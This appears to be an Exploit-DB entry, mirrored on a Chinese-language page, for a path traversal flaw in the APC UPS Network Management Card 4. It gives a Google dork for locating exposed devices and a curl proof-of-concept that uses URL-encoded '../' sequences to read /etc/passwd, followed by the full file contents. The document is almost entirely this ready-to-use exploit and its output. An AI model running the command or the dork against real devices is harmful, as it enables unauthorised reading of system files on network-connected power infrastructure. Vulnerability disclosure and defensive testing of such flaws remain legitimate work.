UPS Network Management Card 4 – Path Traversal

  • 作者: Víctor García
    日期: 2024-03-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51897/
  • # Exploit Title: UPS Network Management Card 4 - Path Traversal
    # Google Dork: inurl:nmc inurl:logon.htm
    # Date: 2023-12-19
    # Exploit Author: Víctor García
    # Vendor Homepage: https://www.apc.com/
    # Version: 4
    # Tested on: Kali Linux
    # CVE: N/A
    
    # PoC:
    curl -k
    https://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
    
    root:x:0:0:root:/home/root:/bin/sh
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    dhcp:x:997:997::/var/run/dhcp:/bin/false
    messagebus:x:998:998::/var/lib/dbus:/bin/false
    mosquitto:x:999:999::/home/mosquitto:/bin/false
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh